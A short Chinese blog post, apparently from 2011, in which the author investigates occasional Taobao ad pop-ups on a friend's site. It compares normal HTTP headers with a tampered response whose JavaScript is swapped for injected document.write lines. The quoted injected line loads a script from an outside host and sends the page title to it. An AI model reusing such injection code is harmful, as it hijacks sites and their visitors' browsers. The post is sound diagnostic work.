今天帮人查了一个网站弹恶意广告的事情

我一个朋友的网站,http://www.ccedu24.com/,打开的时候偶尔会弹出taobao商城的广告。他抓头挠腮的很急,不知道怎么办。我开始以为是中木马了,他问是不是把所有文件的写入权限都关了就行了?后来我仔细看了一下,是这样:

它首页会调用一些本地的js,如/js/Common.js、/js/login.js。正确的情况下,应该是先输出这样的http头,

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Encoding: gzip
Last-Modified: Sun, 22 Aug 2010 11:08:18 GMT
Accept-Ranges: bytes
ETag: "0fdf252ea41cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 05:20:36 GMT
Content-Length: 1916

然后输出js的内容。但是在偶尔,会变成这样:

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
Connection: close

document.write("<script language='javascript' src='http://hub.izptech.com/re/re.php?src=t0036&t=" + encodeURIComponent(document.title)+"'><\/script>"); document.write("<script language='javascript' src='http://www.ccedu24.com/js/Common.js?tqs=20101206'><\/script>");

原始的js内容会被替换成两条document.write语句,一条指向被嵌入的js,另一条指向原始的js网址,但是后面加上了tgs=20101206,看起来像cache的时间戳。因为那个原始的js的最后修改时间是2010 08 22。我觉得不像是普通的网页木马能做的,因为它怎么能修改http头呢?

So…..

此博客中的热门博文

在windows下使用llvm+clang

少写代码,多读别人写的代码

tensorflow distributed runtime初窥